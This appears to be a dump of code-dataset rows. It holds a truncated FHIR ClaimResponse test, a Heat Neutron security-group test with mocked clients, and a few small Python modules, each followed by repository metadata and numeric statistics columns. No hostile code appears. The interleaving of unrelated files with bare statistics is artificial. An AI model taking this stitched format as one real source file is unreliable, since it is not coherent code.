self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "complete")
self.assertEqual(inst.payeeType.coding[0].code, "provider")
self.assertEqual(inst.payeeType.coding[0].system, "http://terminology.hl7.org/CodeSystem/payeetype")
self.assertEqual(inst.payment.adjustment.currency, "USD")
self.assertEqual(inst.payment.adjustment.value, 75.0)
self.assertEqual(inst.payment.adjustmentReason.coding[0].code, "a002")
self.assertEqual(inst.payment.adjustmentReason.coding[0].display, "Prior Overpayment")
self.assertEqual(inst.payment.adjustmentReason.coding[0].system, "http://terminology.hl7.org/CodeSystem/payment-adjustment-reason")
self.assertEqual(inst.payment.amount.currency, "USD")
self.assertEqual(inst.payment.amount.value, 107.0)
self.assertEqual(inst.payment.date.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.payment.date.as_json(), "2014-08-16")
self.assertEqual(inst.payment.identifier.system, "http://thebenefitcompany.com/paymentidentifier")
self.assertEqual(inst.payment.identifier.value, "201416-123456")
self.assertEqual(inst.payment.type.coding[0].code, "complete")
self.assertEqual(inst.payment.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/ex-paymenttype")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 1)
self.assertEqual(inst.processNote[0].text, "After hours surcharge declined")
self.assertEqual(inst.processNote[0].type, "display")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.total[0].amount.currency, "USD")
self.assertEqual(inst.total[0].amount.value, 235.4)
self.assertEqual(inst.total[0].category.coding[0].code, "submitted")
self.assertEqual(inst.total[1].amount.currency, "USD")
self.assertEqual(inst.total[1].amount.value, 182.0)
self.assertEqual(inst.total[1].category.coding[0].code, "benefit")
self.assertEqual(inst.type.coding[0].code, "vision")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
def testClaimResponse5(self):
inst = self.instantiate_from("claimresponse-example-2.json")
self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
self.implClaimResponse5(inst)
js = inst.as_json()
self.assertEqual("ClaimResponse", js["resourceType"])
inst2 = claimresponse.ClaimResponse(js)
self.implClaimResponse5(inst2)
def implClaimResponse5(self, inst):
self.assertEqual(inst.created.date, FHIRDate("2014-08-16").date)
self.assertEqual(inst.created.as_json(), "2014-08-16")
self.assertEqual(inst.disposition, "Claim could not be processed")
self.assertEqual(inst.error[0].code.coding[0].code, "a002")
self.assertEqual(inst.error[0].code.coding[0].system, "http://terminology.hl7.org/CodeSystem/adjudication-error")
self.assertEqual(inst.error[0].detailSequence, 2)
self.assertEqual(inst.error[0].itemSequence, 3)
self.assertEqual(inst.formCode.coding[0].code, "2")
self.assertEqual(inst.formCode.coding[0].system, "http://terminology.hl7.org/CodeSystem/forms-codes")
self.assertEqual(inst.id, "R3501")
self.assertEqual(inst.identifier[0].system, "http://www.BenefitsInc.com/fhir/remittance")
self.assertEqual(inst.identifier[0].value, "R3501")
self.assertEqual(inst.meta.tag[0].code, "HTEST")
self.assertEqual(inst.meta.tag[0].display, "test health data")
self.assertEqual(inst.meta.tag[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActReason")
self.assertEqual(inst.outcome, "error")
self.assertEqual(inst.processNote[0].language.coding[0].code, "en-CA")
self.assertEqual(inst.processNote[0].language.coding[0].system, "urn:ietf:bcp:47")
self.assertEqual(inst.processNote[0].number, 1)
self.assertEqual(inst.processNote[0].text, "Invalid claim")
self.assertEqual(inst.processNote[0].type, "display")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the ClaimResponse that demonstrates returning errors</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "oral")
self.assertEqual(inst.type.coding[0].system, "http://terminology.hl7.org/CodeSystem/claim-type")
self.assertEqual(inst.use, "claim")
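# The five test/impl pairs above repeat the same serialize/deserialize round
# trip. A hypothetical helper (a sketch, not part of the generated suite) could
# factor it out, assuming only instantiate_from and claimresponse as used above.
def _roundtrip_claimresponse(self, filename, impl):
    inst = self.instantiate_from(filename)
    self.assertIsNotNone(inst, "Must have instantiated a ClaimResponse instance")
    impl(inst)
    js = inst.as_json()
    self.assertEqual("ClaimResponse", js["resourceType"])
    impl(claimresponse.ClaimResponse(js))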
| 73.018947
| 210
| 0.696517
| 4,513
| 34,684
| 5.348327
| 0.067583
| 0.246095
| 0.306998
| 0.123876
| 0.922401
| 0.912458
| 0.906078
| 0.876745
| 0.847413
| 0.822016
| 0
| 0.046546
| 0.135279
| 34,684
| 474
| 211
| 73.172996
| 0.758236
| 0.003431
| 0
| 0.463252
| 1
| 0.002227
| 0.141324
| 0.005614
| 0
| 0
| 0
| 0
| 0.895323
| 1
| 0.024499
| false
| 0
| 0.013363
| 0
| 0.042316
| 0.004454
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
3591ce9245724bd3904c836c9e95042ce5a506db
| 324
|
py
|
Python
|
SBaaS_rnasequencing/stage01_rnasequencing_genesFpkmTracking_execute.py
|
dmccloskey/SBaaS_rnasequencing
|
521ad0b671b0bca02e9cebfc1b372f2265955418
|
[
"MIT"
] | null | null | null |
SBaaS_rnasequencing/stage01_rnasequencing_genesFpkmTracking_execute.py
|
dmccloskey/SBaaS_rnasequencing
|
521ad0b671b0bca02e9cebfc1b372f2265955418
|
[
"MIT"
] | null | null | null |
SBaaS_rnasequencing/stage01_rnasequencing_genesFpkmTracking_execute.py
|
dmccloskey/SBaaS_rnasequencing
|
521ad0b671b0bca02e9cebfc1b372f2265955418
|
[
"MIT"
] | null | null | null |
from copy import copy
#sbaas
from .stage01_rnasequencing_genesFpkmTracking_io import stage01_rnasequencing_genesFpkmTracking_io
#sbaas models
from .stage01_rnasequencing_genesFpkmTracking_postgresql_models import *
class stage01_rnasequencing_genesFpkmTracking_execute(stage01_rnasequencing_genesFpkmTracking_io):
pass
| 40.5
| 98
| 0.904321
| 34
| 324
| 8.147059
| 0.382353
| 0.361011
| 0.66787
| 0.422383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033113
| 0.067901
| 324
| 8
| 99
| 40.5
| 0.884106
| 0.052469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.8
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
35bf551525187ed9a5c3be694ec4026e761e04b3
| 45
|
py
|
Python
|
lib/protos/__init__.py
|
skygoo/Peppa_Pig_Face_Engine
|
9e091b1da87202ae5bebb0446ae39bc101052e02
|
[
"Apache-2.0"
] | 1
|
2020-06-02T09:54:24.000Z
|
2020-06-02T09:54:24.000Z
|
lib/protos/__init__.py
|
skygoo/Peppa_Pig_Face_Engine
|
9e091b1da87202ae5bebb0446ae39bc101052e02
|
[
"Apache-2.0"
] | 6
|
2020-01-28T23:05:40.000Z
|
2022-02-10T01:06:06.000Z
|
lib/protos/__init__.py
|
skygoo/Peppa_Pig_Face_Engine
|
9e091b1da87202ae5bebb0446ae39bc101052e02
|
[
"Apache-2.0"
] | null | null | null |
# User: sky
# DATE: 2019/10/23
# TIME: 5:18 PM
| 15
| 18
| 0.622222
| 9
| 45
| 3.111111
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.297297
| 0.177778
| 45
| 3
| 19
| 15
| 0.459459
| 0.866667
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea269aa22435ff1a7d5a52c8867507efeb8081ad
| 28,848
|
py
|
Python
|
heat/tests/openstack/neutron/test_neutron_security_group.py
|
noironetworks/heat
|
7cdadf1155f4d94cf8f967635b98e4012a7acfb7
|
[
"Apache-2.0"
] | 1
|
2018-07-04T07:59:26.000Z
|
2018-07-04T07:59:26.000Z
|
heat/tests/openstack/neutron/test_neutron_security_group.py
|
noironetworks/heat
|
7cdadf1155f4d94cf8f967635b98e4012a7acfb7
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
heat/tests/openstack/neutron/test_neutron_security_group.py
|
noironetworks/heat
|
7cdadf1155f4d94cf8f967635b98e4012a7acfb7
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutronclient.common import exceptions as neutron_exc
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.v2_0 import client as neutronclient
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import neutron
from heat.engine import scheduler
from heat.engine import stack as parser
from heat.engine import template
from heat.tests import common
from heat.tests import utils
class SecurityGroupTest(common.HeatTestCase):
test_template = '''
heat_template_version: 2015-04-30
resources:
the_sg:
type: OS::Neutron::SecurityGroup
properties:
description: HTTP and SSH access
rules:
- port_range_min: 22
port_range_max: 22
remote_ip_prefix: 0.0.0.0/0
protocol: tcp
- port_range_min: 80
port_range_max: 80
protocol: tcp
remote_ip_prefix: 0.0.0.0/0
- remote_mode: remote_group_id
remote_group_id: wwww
protocol: tcp
- direction: egress
port_range_min: 22
port_range_max: 22
protocol: tcp
remote_ip_prefix: 10.0.1.0/24
- direction: egress
remote_mode: remote_group_id
remote_group_id: xxxx
- direction: egress
remote_mode: remote_group_id
'''
test_template_update = '''
heat_template_version: 2015-04-30
resources:
the_sg:
type: OS::Neutron::SecurityGroup
properties:
description: SSH access for private network
name: myrules
rules:
- port_range_min: 22
port_range_max: 22
remote_ip_prefix: 10.0.0.10/24
protocol: tcp
'''
test_template_validate = '''
heat_template_version: 2015-04-30
resources:
the_sg:
type: OS::Neutron::SecurityGroup
properties:
name: default
'''
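# setUp below swaps the real neutron client for a mock.Mock, so each test can
# script API responses via return_value / side_effect and then assert the exact
# sequence of create/show/delete calls the resource made.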
def setUp(self):
super(SecurityGroupTest, self).setUp()
self.mockclient = mock.Mock(spec=neutronclient.Client)
self.patchobject(neutronclient, 'Client', return_value=self.mockclient)
def lookup(client, lookup_type, name, cmd_resource):
return name
self.patchobject(neutronV20, 'find_resourceid_by_name_or_id',
side_effect=lookup)
self.patchobject(neutron.NeutronClientPlugin, 'has_extension',
return_value=True)
def create_stack(self, templ):
t = template_format.parse(templ)
self.stack = self.parse_stack(t)
self.assertIsNone(self.stack.create())
return self.stack
def parse_stack(self, t):
stack_name = 'test_stack'
tmpl = template.Template(t)
stack = parser.Stack(utils.dummy_context(), stack_name, tmpl)
stack.store()
return stack
def assertResourceState(self, rsrc, ref_id, metadata=None):
metadata = metadata or {}
self.assertIsNone(rsrc.validate())
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
self.assertEqual(ref_id, rsrc.FnGetRefId())
self.assertEqual(metadata, dict(rsrc.metadata_get()))
def test_security_group(self):
show_created = {'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'sc1',
'description': '',
'security_group_rules': [{
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'bbbb',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '80',
'id': 'cccc',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '80'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': None,
'id': 'dddd',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'eeee',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'ffff',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'gggg',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}],
'id': 'aaaa'}
}
# create script
sg_name = utils.PhysName('test_stack', 'the_sg')
self.mockclient.create_security_group.return_value = {
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [{
"direction": "egress",
"ethertype": "IPv4",
"id": "aaaa-1",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}, {
"direction": "egress",
"ethertype": "IPv6",
"id": "aaaa-2",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}],
'id': 'aaaa'
}
}
self.mockclient.create_security_group_rule.side_effect = [
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'bbbb'
}
},
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '80',
'ethertype': 'IPv4',
'port_range_max': '80',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'cccc'
}
},
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'dddd'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'eeee'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'ffff'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'gggg'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'hhhh'
}
},
{
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv6',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa',
'id': 'iiii'
}
},
{
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.0.10/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa',
'id': 'jjjj'
}
},
]
self.mockclient.show_security_group.side_effect = [
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [{
"direction": "egress",
"ethertype": "IPv4",
"id": "aaaa-1",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}, {
"direction": "egress",
"ethertype": "IPv6",
"id": "aaaa-2",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "aaaa",
"tenant_id": "f18ca530cc05425e8bac0a5ff92f7e88"
}],
'id': 'aaaa'
}
},
show_created,
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'sc1',
'description': '',
'security_group_rules': [],
'id': 'aaaa'
}
},
show_created,
]
self.mockclient.delete_security_group_rule.return_value = None
# update script
self.mockclient.update_security_group.return_value = {
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'myrules',
'description': 'SSH access for private network',
'security_group_rules': [],
'id': 'aaaa'
}
}
# delete script
self.mockclient.delete_security_group.return_value = None
stack = self.create_stack(self.test_template)
sg = stack['the_sg']
self.assertResourceState(sg, 'aaaa')
updated_tmpl = template_format.parse(self.test_template_update)
updated_stack = utils.parse_stack(updated_tmpl)
stack.update(updated_stack)
stack.delete()
self.mockclient.create_security_group.assert_called_once_with({
'security_group': {
'name': sg_name,
'description': 'HTTP and SSH access'
}
})
self.mockclient.create_security_group_rule.assert_has_calls([
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '80',
'ethertype': 'IPv4',
'port_range_max': '80',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'ethertype': 'IPv6',
'security_group_id': 'aaaa',
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.0.10/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
])
self.mockclient.show_security_group.assert_called_with('aaaa')
self.mockclient.delete_security_group_rule.assert_has_calls([
mock.call('aaaa-1'),
mock.call('aaaa-2'),
# update script
mock.call('bbbb'),
mock.call('cccc'),
mock.call('dddd'),
mock.call('eeee'),
mock.call('ffff'),
mock.call('gggg'),
# delete script
mock.call('bbbb'),
mock.call('cccc'),
mock.call('dddd'),
mock.call('eeee'),
mock.call('ffff'),
mock.call('gggg'),
])
self.mockclient.update_security_group.assert_called_once_with(
'aaaa',
{'security_group': {
'description': 'SSH access for private network',
'name': 'myrules'}}
)
self.mockclient.delete_security_group.assert_called_once_with('aaaa')
def test_security_group_exception(self):
# create script
sg_name = utils.PhysName('test_stack', 'the_sg')
self.mockclient.create_security_group.return_value = {
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [],
'id': 'aaaa'
}
}
self.mockclient.create_security_group_rule.side_effect = [
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
neutron_exc.Conflict,
]
self.mockclient.show_security_group.side_effect = [
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': sg_name,
'description': 'HTTP and SSH access',
'security_group_rules': [],
'id': 'aaaa'
}
},
# delete script
{
'security_group': {
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'name': 'sc1',
'description': '',
'security_group_rules': [{
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'bbbb',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '80',
'id': 'cccc',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '80'
}, {
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': None,
'id': 'dddd',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'eeee',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': '22'
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'ffff',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': 'xxxx',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}, {
'direction': 'egress',
'protocol': None,
'port_range_max': None,
'id': 'gggg',
'ethertype': 'IPv4',
'security_group_id': 'aaaa',
'remote_group_id': None,
'remote_ip_prefix': 'aaaa',
'tenant_id': 'f18ca530cc05425e8bac0a5ff92f7e88',
'port_range_min': None
}],
'id': 'aaaa'}
},
neutron_exc.NeutronClientException(status_code=404),
]
# delete script
self.mockclient.delete_security_group_rule.side_effect = (
neutron_exc.NeutronClientException(status_code=404))
self.mockclient.delete_security_group.side_effect = (
neutron_exc.NeutronClientException(status_code=404))
stack = self.create_stack(self.test_template)
sg = stack['the_sg']
self.assertResourceState(sg, 'aaaa')
scheduler.TaskRunner(sg.delete)()
sg.state_set(sg.CREATE, sg.COMPLETE, 'to delete again')
sg.resource_id = 'aaaa'
stack.delete()
self.mockclient.create_security_group.assert_called_once_with({
'security_group': {
'name': sg_name,
'description': 'HTTP and SSH access'
}
})
self.mockclient.create_security_group_rule.assert_has_calls([
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '80',
'ethertype': 'IPv4',
'port_range_max': '80',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': 'wwww',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': None,
'remote_ip_prefix': '10.0.1.0/24',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'xxxx',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
mock.call({
'security_group_rule': {
'direction': 'egress',
'remote_group_id': 'aaaa',
'remote_ip_prefix': None,
'port_range_min': None,
'ethertype': 'IPv4',
'port_range_max': None,
'protocol': None,
'security_group_id': 'aaaa'
}
}),
])
self.mockclient.show_security_group.assert_called_with('aaaa')
self.mockclient.delete_security_group_rule.assert_has_calls([
mock.call('bbbb'),
mock.call('cccc'),
mock.call('dddd'),
mock.call('eeee'),
mock.call('ffff'),
mock.call('gggg'),
])
self.mockclient.delete_security_group.assert_called_with('aaaa')
def test_security_group_validate(self):
stack = self.create_stack(self.test_template_validate)
sg = stack['the_sg']
ex = self.assertRaises(exception.StackValidationFailed, sg.validate)
self.assertEqual(
'Security groups cannot be assigned the name "default".',
ex.message)
| 37.032092
| 79
| 0.440342
| 2,345
| 28,848
| 5.116844
| 0.090405
| 0.11701
| 0.040337
| 0.063339
| 0.807317
| 0.800567
| 0.783315
| 0.754313
| 0.724644
| 0.718977
| 0
| 0.046115
| 0.446755
| 28,848
| 778
| 80
| 37.079692
| 0.705702
| 0.022809
| 0
| 0.774238
| 0
| 0
| 0.309132
| 0.033409
| 0
| 0
| 0
| 0
| 0.029086
| 1
| 0.01108
| false
| 0
| 0.016621
| 0.001385
| 0.037396
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
575e08c5bbbac7b9f16ee8927985ae10ecdab378
| 288
|
py
|
Python
|
S4/S4 Library/simulation/venues/chalet_garden/chalet_garden_zone_director.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:37.000Z
|
2021-05-20T19:33:37.000Z
|
S4/S4 Library/simulation/venues/chalet_garden/chalet_garden_zone_director.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
S4/S4 Library/simulation/venues/chalet_garden/chalet_garden_zone_director.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
from venues.scheduling_zone_director import SchedulingZoneDirector
from venues.visitor_situation_on_arrival_zone_director_mixin import VisitorSituationOnArrivalZoneDirectorMixin
class ChaletGardenZoneDirector(VisitorSituationOnArrivalZoneDirectorMixin, SchedulingZoneDirector):
pass
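# Note: with this base order, Python's MRO dispatches to
# VisitorSituationOnArrivalZoneDirectorMixin before SchedulingZoneDirector
# whenever both define the same hook.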
| 48
| 110
| 0.920139
| 23
| 288
| 11.173913
| 0.695652
| 0.077821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059028
| 288
| 5
| 111
| 57.6
| 0.948339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
